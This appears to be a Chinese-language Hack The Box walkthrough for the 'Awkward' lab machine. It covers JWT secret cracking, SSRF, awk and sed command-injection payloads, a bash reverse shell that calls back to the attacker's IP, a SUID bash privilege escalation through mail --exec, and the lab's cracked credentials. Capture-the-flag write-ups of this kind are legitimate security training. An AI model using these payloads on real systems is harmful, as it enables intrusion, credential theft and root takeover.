[hackthebox]Awkward Writeup

前言

过年期间，闲来无事，打了一些htb的机子。目标是在年假期间打到Hacker级别（已完成），后面的Pro Hacker等级，有空闲时间再冲吧。

题目信息

等级：Medium

题目地址：https://app.hackthebox.com/machines/Awkward

端口扫描

┌─[✗]─[root@parrot]─[/home/rainb0w/Desktop]
└──╼ #nmap -sS -sC -sV -A -p- --min-rate 5000 10.10.11.185
Starting Nmap 7.80 ( https://nmap.org ) at 2023-01-28 23:50 CST
Nmap scan report for 10.10.11.185 (10.10.11.185)
Host is up (0.26s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=1/28%OT=22%CT=1%CU=37376%PV=Y%DS=2%DC=T%G=Y%TM=63D5449
OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M539ST11NW7%O2=M539ST11NW7%O3=M539NNT11NW7%O4=M539ST11NW7%O5=M539ST11
OS:NW7%O6=M539ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M539NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 587/tcp)
HOP RTT       ADDRESS
1   260.18 ms 10.10.14.1 (10.10.14.1)
2   260.43 ms 10.10.11.185 (10.10.11.185)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.81 seconds

user.txt

可以看到只开放了两个端口：22和80。直接进入80端口，发现网站被重定向到了http://hat-valley.htb/，我们可以将hat-valley.htb写入hosts中。接着利用gobuster爆破一下子域名及目录：

子域名扫描：

┌─[root@parrot]─[/home/rainb0w/Desktop]
└──╼ #gobuster vhost -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u hat-valley.htb -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:          http://hat-valley.htb
[+] Threads:      50
[+] Wordlist:     /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent:   gobuster/3.0.1
[+] Timeout:      10s
===============================================================
2023/01/28 23:55:52 Starting gobuster
===============================================================
Found: store.hat-valley.htb (Status: 401) [Size: 188]
===============================================================
2023/01/28 23:56:21 Finished
===============================================================

找到一个子域名store.hat-valley.htb，将其也写入hosts。

目录爆破：

┌─[root@parrot]─[/home/rainb0w/Desktop]
└──╼ #gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://hat-valley.htb/ -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://hat-valley.htb/
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2023/01/28 23:57:12 Starting gobuster
===============================================================
/static (Status: 301)
/css (Status: 301)
/js (Status: 301)
===============================================================
2023/01/29 00:17:59 Finished
===============================================================

进入http://hat-valley.htb/，查看网页源码，可以找到一个app.js的敏感文件：

发现有一个/hr路径：

尝试访问，发现是一个登陆界面：

发现Cookie为token=guest：

尝试将guest修改为admin，刷新页面，登陆成功！

但是这里似乎没有什么有用的东西。查看network标签页，发现两个可疑的路径：

在新标签页中打开这两个路径，其中/api/staff-details显示如下：

/api/store-status?url="http:%2F%2Fstore.hat-valley.htb"是个空白页。

在/api/staff-details中提示jwt格式错误。将token设为空，可以看到用户的username及hash加密过的password：

试着放在crackstation中爆破一下，结果如下：

拿到其中一个人的password，去登陆一下，得到正常用户的jwt:

接下来尝试爆破jwt的密钥，我这里利用的是[jwtcrack](https://github.com/Sjord/jwtcrack)工具中的jwt2john.py和john：

┌─[root@parrot]─[/home/rainb0w/Desktop]
└──╼ #john --wordlist=/usr/share/wordlists/rockyou.txt hash 
Using default input encoding: UTF-8
Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any other key for status
123beany123      (?)
1g 0:00:00:04 DONE (2023-01-29 00:16) 0.2444g/s 3259Kp/s 3259Kc/s 3259KC/s 123bettyboo..123arsenal123.
Use the "--show" option to display all of the cracked passwords reliably
Session completed

成功得到密钥123beany123。接着我们看一下/api/store-status路径，可以发现这里可以传入一个url参数，怀疑存在SSRF，试着利用file协议读取/etc/passwd，未果。设url=”http://127.0.0.1:80"，发现网站被重定向到了http://hat-valley.htb/，尝试FUZZ一下哪些端口被开放：

FUZZ结果如下：

┌─[root@parrot]─[/home/rainb0w/Desktop]
└──╼ #ffuf -w /usr/share/SecLists/Fuzzing/4-digits-0000-9999.txt -u http://hat-valley.htb/api/store-status?url=%22http://127.0.0.1:FUZZ%22 -fs 0

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.4.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://hat-valley.htb/api/store-status?url=%22http://127.0.0.1:FUZZ%22
 :: Wordlist         : FUZZ: /usr/share/SecLists/Fuzzing/4-digits-0000-9999.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 0
________________________________________________

0080                    [Status: 200, Size: 132, Words: 6, Lines: 9, Duration: 269ms]
3002                    [Status: 200, Size: 77010, Words: 5916, Lines: 686, Duration: 292ms]
8080                    [Status: 200, Size: 2881, Words: 305, Lines: 55, Duration: 281ms]
:: Progress: [10000/10000] :: Job [1/1] :: 147 req/sec :: Duration: [0:01:10] :: Errors: 0 ::

存在3个端口：80，3002，8080。传入url="http://127.0.0.1:3002"，可以看到该网站的API文档及源码：

其中在/api/all-leave中存在任意文件读取漏洞：

app.get('/api/all-leave', (req, res) => {

  const user_token = req.cookies.token

  var authFailed = false

  var user = null

  if(user_token) {

    const decodedToken = jwt.verify(user_token, TOKEN_SECRET)

    if(!decodedToken.username) {

      authFailed = true

    }

    else {

      user = decodedToken.username

    }

  }

  if(authFailed) {

    return res.status(401).json({Error: "Invalid Token"})

  }

  if(!user) {

    return res.status(500).send("Invalid user")

  }

  const bad = [";","&","|",">","<","*","?","`","$","(",")","{","}","[","]","!","#"]


  const badInUser = bad.some(char => user.includes(char));


  if(badInUser) {

    return res.status(500).send("Bad character detected.")

  }


  exec("awk '/" + user + "/' /var/www/private/leave_requests.csv", {encoding: 'binary', maxBuffer: 51200000}, (error, stdout, stderr) => {

    if(stdout) {

      return res.status(200).send(new Buffer(stdout, 'binary'));

    }

    if (error) {

      return res.status(500).send("Failed to retrieve leave requests")

    }

    if (stderr) {

      return res.status(500).send("Failed to retrieve leave requests")

    }

  })

})

重点看这一句：

exec("awk '/" + user + "/' /var/www/private/leave_requests.csv"

在这个接口中，首先会对我们的jwt进行解密，接着将其中的username赋值给user变量，而此时我们拥有jwt的密钥，因此我们user变量是我们可控的。

假设我们伪造的jwt中的username字段为**./' /etc/passwd '**，这样user进行拼接后，完整的命令为：

awk '/./' /etc/passwd '/' /var/www/private/leave_requests.csv

熟悉awk命令的都知道，我们利用两个斜杠中的内容为正则表达式，也就是说我们利用’.’这个字符来匹配所有字符，此时我们就可以匹配到/etc/passwd的所有内容。让我们在本地执行一下这个命令：

可以看到/etc/passwd被成功读取。接着我们伪造jwt如下：

读取/etc/passwd：

┌─[✗]─[root@parrot]─[/home/rainb0w/Desktop]
└──╼ #curl http://hat-valley.htb/api/all-leave -b "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ii4vJyAvZXRjL3Bhc3N3ZCAnIiwiaWF0IjoxNjc0OTIyMzU5fQ.EXprLPOLwnnrr0aQeEymzkRicpIG-SUIg7DLKeO5qU4"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:102:105::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:103:106:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
syslog:x:104:111::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:112:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:115::/run/uuidd:/usr/sbin/nologin
systemd-oom:x:108:116:systemd Userspace OOM Killer,,,:/run/systemd:/usr/sbin/nologin
tcpdump:x:109:117::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
avahi:x:114:121:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
cups-pk-helper:x:115:122:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
rtkit:x:116:123:RealtimeKit,,,:/proc:/usr/sbin/nologin
whoopsie:x:117:124::/nonexistent:/bin/false
sssd:x:118:125:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
speech-dispatcher:x:119:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
nm-openvpn:x:120:126:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
saned:x:121:128::/var/lib/saned:/usr/sbin/nologin
colord:x:122:129:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:123:130::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:124:131:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:125:65534::/run/gnome-initial-setup/:/bin/false
hplip:x:126:7:HPLIP system user,,,:/run/hplip:/bin/false
gdm:x:127:133:Gnome Display Manager:/var/lib/gdm3:/bin/false
bean:x:1001:1001:,,,:/home/bean:/bin/bash
christine:x:1002:1002:,,,:/home/christine:/bin/bash
postfix:x:128:136::/var/spool/postfix:/usr/sbin/nologin
mysql:x:129:138:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:130:65534::/run/sshd:/usr/sbin/nologin
_laurel:x:999:999::/var/log/laurel:/bin/false

可以看到这台机子有3个用户，分别是root，bean和christine。尝试读取bean和christine的ssh文件，/home/bean/.ssh/id_rsa和/home/christine/.ssh/id_rsa均未有任何响应。读取bean用户的.bashrc文件：

┌─[root@parrot]─[/home/rainb0w/Desktop]
└──╼ #curl http://hat-valley.htb/api/all-leave -b "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ii4vJyAvaG9tZS9iZWFuLy5iYXNocmMgJyIsImlhdCI6MTY3NDkyMjM1OX0.-soLFOExCLVbRPy3c1-quqNBqWbHmff2qL4Xu97gdtg"
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
# If not running interactively, don't do anything
case $- in
    *i*) ;;
      *) return;;
esac
# don't put duplicate lines or lines starting with space in the history.
# See bash(1) for more options
HISTCONTROL=ignoreboth
# append to the history file, don't overwrite it
shopt -s histappend
# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=1000
HISTFILESIZE=2000
# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize
# If set, the pattern "**" used in a pathname expansion context will
# match all files and zero or more directories and subdirectories.
#shopt -s globstar
# make less more friendly for non-text input files, see lesspipe(1)
[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then
    debian_chroot=$(cat /etc/debian_chroot)
fi
# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
    xterm-color|*-256color) color_prompt=yes;;
esac
# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
#force_color_prompt=yes
if [ -n "$force_color_prompt" ]; then
    if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
	# We have color support; assume it's compliant with Ecma-48
	# (ISO/IEC-6429). (Lack of such support is extremely rare, and such
	# a case would tend to support setf rather than setaf.)
	color_prompt=yes
    else
	color_prompt=
    fi
fi
if [ "$color_prompt" = yes ]; then
    PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
    PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt
# If this is an xterm set the title to user@host:dir
case "$TERM" in
xterm*|rxvt*)
    PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
    ;;
*)
    ;;
esac
# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
    test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
    alias ls='ls --color=auto'
    #alias dir='dir --color=auto'
    #alias vdir='vdir --color=auto'
    alias grep='grep --color=auto'
    alias fgrep='fgrep --color=auto'
    alias egrep='egrep --color=auto'
fi
# colored GCC warnings and errors
#export GCC_COLORS='error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01'
# some more ls aliases
alias ll='ls -alF'
alias la='ls -A'
alias l='ls -CF'
# custom
alias backup_home='/bin/bash /home/bean/Documents/backup_home.sh'
# Add an "alert" alias for long running commands.  Use like so:
#   sleep 10; alert
alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '\''s/^\s*[0-9]\+\s*//;s/[;&|]\s*alert$//'\'')"'
# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.
if [ -f ~/.bash_aliases ]; then
    . ~/.bash_aliases
fi
# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
if ! shopt -oq posix; then
  if [ -f /usr/share/bash-completion/bash_completion ]; then
    . /usr/share/bash-completion/bash_completion
  elif [ -f /etc/bash_completion ]; then
    . /etc/bash_completion
  fi
fi

发现有一个backup_home.sh文件，怀疑与home目录的备份有关系，尝试读取/home/bean/Documents/backup_home.sh：

┌─[root@parrot]─[/home/rainb0w/Desktop]
└──╼ #curl http://hat-valley.htb/api/all-leave -b "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ii4vJyAvaG9tZS9iZWFuL0RvY3VtZW50cy9iYWNrdXBfaG9tZS5zaCAnIiwiaWF0IjoxNjc0OTIyMzU5fQ.iAGaOQVbBg1rKAdG1H3zeOosRwvwW7yP8uIFsDtXQ5s"
#!/bin/bash
mkdir /home/bean/Documents/backup_tmp
cd /home/bean
tar --exclude='.npm' --exclude='.cache' --exclude='.vscode' -czvf /home/bean/Documents/backup_tmp/bean_backup.tar.gz .
date > /home/bean/Documents/backup_tmp/time.txt
cd /home/bean/Documents/backup_tmp
tar -czvf /home/bean/Documents/backup/bean_backup_final.tar.gz .
rm -r /home/bean/Documents/backup_tmp

可以看到这里将/home/bean目录进行了压缩，且就在/home/bean/Documents/backup/bean_backup_final.tar.gz中，我们下载下来：

┌─[root@parrot]─[/home/rainb0w/Desktop]
└──╼ #curl http://hat-valley.htb/api/all-leave -b "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ii4vJyAvaG9tZS9iZWFuL0RvY3VtZW50cy9iYWNrdXAvYmVhbl9iYWNrdXBfZmluYWwudGFyLmd6ICciLCJpYXQiOjE2NzQ5MjIzNTl9.PLcLBxoaAfCESZJkq9za0h0okRXIm6twDMaS-4Z4GHE" --output bean_backup_final.zip
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 31714  100 31714    0     0  39153      0 --:--:-- --:--:-- --:--:-- 39104

解压后，在.config/xpad/content-DS1ZS1中得到bean的ssh密码：

┌─[root@parrot]─[/home/rainb0w/Desktop/1]
└──╼ #cat .config/xpad/content-DS1ZS1 
TO DO:
- Get real hat prices / stock from Christine
- Implement more secure hashing mechanism for HR system
- Setup better confirmation message when adding item to cart
- Add support for item quantity > 1
- Implement checkout system

boldHR SYSTEM/bold
bean.hill
014mrbeanrules!#P

https://www.slac.stanford.edu/slac/www/resource/how-to-use/cgi-rexx/cgi-esc.html

boldMAKE SURE TO USE THIS EVERYWHERE ^^^/bold

登陆后，即可看到user.txt。

权限提升

上传linpeas.sh文件并运行：

可以看到这个配置文件正是刚刚爆破的子域名的配置文件。进入http://store.hat-valley.htb/如下所示：

可以在/etc/nginx/sites-available/store.conf中看到auth_basic_user_file的值为/etc/nginx/conf.d/.htpasswd，auth_basic_user_file配置指定保存用户名密码的文件。

查看/etc/nginx/conf.d/.htpasswd文件，内容如下：

其中username为admin，密码无法爆破。我们将刚才登陆bean的ssh密码作为登陆http://store.hat-valley.htb/的密码试试，即：

username=admin
password=014mrbeanrules!#P

成功登陆。界面如下：

在刚刚的配置文件中，还可以看到网站源代码的位置为/var/www/store。审计网站源代码，发现cart_actions.php存在命令注入：

<?php

$STORE_HOME = "/var/www/store/";

//check for valid hat valley store item
function checkValidItem($filename) {
    if(file_exists($filename)) {
        $first_line = file($filename)[0];
        if(strpos($first_line, "***Hat Valley") !== FALSE) {
            return true;
        }
    }
    return false;
}

//add to cart
if ($_SERVER['REQUEST_METHOD'] === 'POST' && $_POST['action'] === 'add_item' && $_POST['item'] && $_POST['user']) {
    $item_id = $_POST['item'];
    $user_id = $_POST['user'];
    $bad_chars = array(";","&","|",">","<","*","?","`","$","(",")","{","}","[","]","!","#"); //no hacking allowed!!

    foreach($bad_chars as $bad) {
        if(strpos($item_id, $bad) !== FALSE) {
            echo "Bad character detected!";
            exit;
        }
    }

    foreach($bad_chars as $bad) {
        if(strpos($user_id, $bad) !== FALSE) {
            echo "Bad character detected!";
            exit;
        }
    }

    if(checkValidItem("{$STORE_HOME}product-details/{$item_id}.txt")) {
        if(!file_exists("{$STORE_HOME}cart/{$user_id}")) {
            system("echo '***Hat Valley Cart***' > {$STORE_HOME}cart/{$user_id}");
        }
        system("head -2 {$STORE_HOME}product-details/{$item_id}.txt | tail -1 >> {$STORE_HOME}cart/{$user_id}");
        echo "Item added successfully!";
    }
    else {
        echo "Invalid item";
    }
    exit;
}

//delete from cart
if ($_SERVER['REQUEST_METHOD'] === 'POST' && $_POST['action'] === 'delete_item' && $_POST['item'] && $_POST['user']) {
    $item_id = $_POST['item'];
    $user_id = $_POST['user'];
    $bad_chars = array(";","&","|",">","<","*","?","`","$","(",")","{","}","[","]","!","#"); //no hacking allowed!!

    foreach($bad_chars as $bad) {
        if(strpos($item_id, $bad) !== FALSE) {
            echo "Bad character detected!";
            exit;
        }
    }

    foreach($bad_chars as $bad) {
        if(strpos($user_id, $bad) !== FALSE) {
            echo "Bad character detected!";
            exit;
        }
    }
    if(checkValidItem("{$STORE_HOME}cart/{$user_id}")) {
        system("sed -i '/item_id={$item_id}/d' {$STORE_HOME}cart/{$user_id}");
        echo "Item removed from cart";
    }
    else {
        echo "Invalid item";
    }
    exit;
}

//fetch from cart
if ($_SERVER['REQUEST_METHOD'] === 'GET' && $_GET['action'] === 'fetch_items' && $_GET['user']) {
    $html = "";
    $dir = scandir("{$STORE_HOME}cart");
    $files = array_slice($dir, 2);

    foreach($files as $file) {
        $user_id = substr($file, -18);
        if($user_id === $_GET['user'] && checkValidItem("{$STORE_HOME}cart/{$user_id}")) {
            $product_file = fopen("{$STORE_HOME}cart/{$file}", "r");
            $details = array();
            while (($line = fgets($product_file)) !== false) {
                if(str_replace(array("\r", "\n"), '', $line) !== "***Hat Valley Cart***") { //don't include first line
                    array_push($details, str_replace(array("\r", "\n"), '', $line));
                }
            }
            foreach($details as $cart_item) {
                 $cart_items = explode("&", $cart_item);
                 for($x = 0; $x < count($cart_items); $x++) {
                      $cart_items[$x] = explode("=", $cart_items[$x]); //key and value as separate values in subarray
                 }
                 $html .= "<tr><td>{$cart_items[1][1]}</td><td>{$cart_items[2][1]}</td><td>{$cart_items[3][1]}</td><td><button data-id={$cart_items[0][1]} onclick=\"removeFromCart(this, localStorage.getItem('user'))\" class='remove-item'>Remove</button></td></tr>";
            }
        }
    }
    echo $html;
    exit;
}

?>

重点是这部分代码：

//delete from cart
if ($_SERVER['REQUEST_METHOD'] === 'POST' && $_POST['action'] === 'delete_item' && $_POST['item'] && $_POST['user']) {
    $item_id = $_POST['item'];
    $user_id = $_POST['user'];
    $bad_chars = array(";","&","|",">","<","*","?","`","$","(",")","{","}","[","]","!","#"); //no hacking allowed!!

    foreach($bad_chars as $bad) {
        if(strpos($item_id, $bad) !== FALSE) {
            echo "Bad character detected!";
            exit;
        }
    }

    foreach($bad_chars as $bad) {
        if(strpos($user_id, $bad) !== FALSE) {
            echo "Bad character detected!";
            exit;
        }
    }
    if(checkValidItem("{$STORE_HOME}cart/{$user_id}")) {
        system("sed -i '/item_id={$item_id}/d' {$STORE_HOME}cart/{$user_id}");
        echo "Item removed from cart";
    }
    else {
        echo "Invalid item";
    }
    exit;
}

首先会过滤掉我们POST传入的item参数和user参数，这使得我们无法利用特殊字符来进行命令注入。接着利用checkValidItem函数来判断/var/www/store/cart/{$user_id}文件是否存在且该文件的开头是否有***Hat Valley字样。

//check for valid hat valley store item
function checkValidItem($filename) {
    if(file_exists($filename)) {
        $first_line = file($filename)[0];
        if(strpos($first_line, "***Hat Valley") !== FALSE) {
            return true;
        }
    }
    return false;
}

绕过是验证成功，就会利用system执行一串命令，在这里我们可以滥用sed命令。sed命令的-e参数允许我们传递脚本。假设我们编写的shell文件如下：

首先nc监听1235，接着执行如下命令：

结果如下：

可以看到我们编写的shell确实被执行了。那么我们就可以写入一个shell文件，并构造item使得该shell文件被执行。首先编写/tmp/1.sh，内容为反弹shell的bash命令：

bean@awkward:/tmp$ echo 'bash -c "bash -i >& /dev/tcp/10.10.14.9/1234 0>&1"' > 1.sh
bean@awkward:/tmp$ chmod +x 1.sh

接着我们添加一个合法的hat valley store item：

接着传入POST如下payload:

action=delete_item&item=' -e '1e /tmp/1.sh' /tmp/1.sh '&user=1

成功执行/tmp/1.sh：

接着我们上传pspy监控一下进程，发现系统在利用inotifywait监控/var/www/private/leave_requests.csv文件：

这里介绍一下inotifywait的常用参数：

--timefmt 时间格式
    %y年 %m月 %d日 %H小时 %M分钟
--format 输出格式
    %T时间 %w路径 %f文件名 %e状态
 
-m 始终保持监听状态，默认触发事件即退出
-r 递归查询目录
-q 减少不必要的输出(只打印事件信息)
 
-e 定义监控的事件，可用参数：
    open   打开文件
    access 访问文件
    modify 修改文件
    delete 删除文件
    create 新建文件
    attrib 属性变更
 
--exclude <pattern> 指定要排除监控的文件/目录

可以看出此处inotifywait监控的事件是/var/www/private/leave_requests.csv文件的更改。尝试修改一下/var/www/private/leave_requests.csv文件，看看进程变化：

发现上图中这里使用了具有root权限的mail命令，将”Leave Request:”加上我们写入到/var/www/private/leave_requests.csv中的内容（“test”）发送给了christine用户。这里仍然存在命令注入。参考链接：https://gtfobins.github.io/gtfobins/mail/

根据gtfobins中介绍的，我们可以想到利用mail命令的–exec参数来执行shell脚本。编写shell脚本如下：

#!/bin/bash
chmod +s /bin/bash

接着进行命令注入：

www-data@awkward:~/private$ echo '" --exec="\!/tmp/2.sh"' >> leave_requests.csv

接着以SUID启动/bin/bash，查看root.txt: